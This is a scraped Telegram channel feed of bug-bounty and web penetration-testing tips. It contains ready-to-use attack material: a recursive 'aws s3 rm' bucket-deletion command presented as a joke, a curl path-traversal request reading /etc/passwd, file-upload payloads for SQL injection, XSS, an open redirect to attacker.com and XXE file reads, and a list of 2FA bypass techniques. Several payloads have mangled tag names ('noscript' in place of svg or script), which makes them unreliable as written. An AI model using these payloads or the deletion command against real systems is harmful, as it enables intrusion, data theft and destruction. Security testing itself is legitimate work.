Some Web Application Penetration testing or Bug Bounty notes :)
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
mega.nz
30.4 KB file on MEGA
👍9🔥4
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)
aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
Keep checking my old Posts to continue your learning Process!
👍9🔥3❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Brut Security | Discussion
Community Discussion
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨
This is how you can send such a request using #curl :
This is how you can send such a request using #curl :
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
👍9🔥4❤3🥰1
👍3🔥1
Now you can detect phishing websites quickly with Nuclei❤
nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥3👍1
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"
-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>
XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍6🔥1
2FA Bypass Techniques
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
🔥12👍5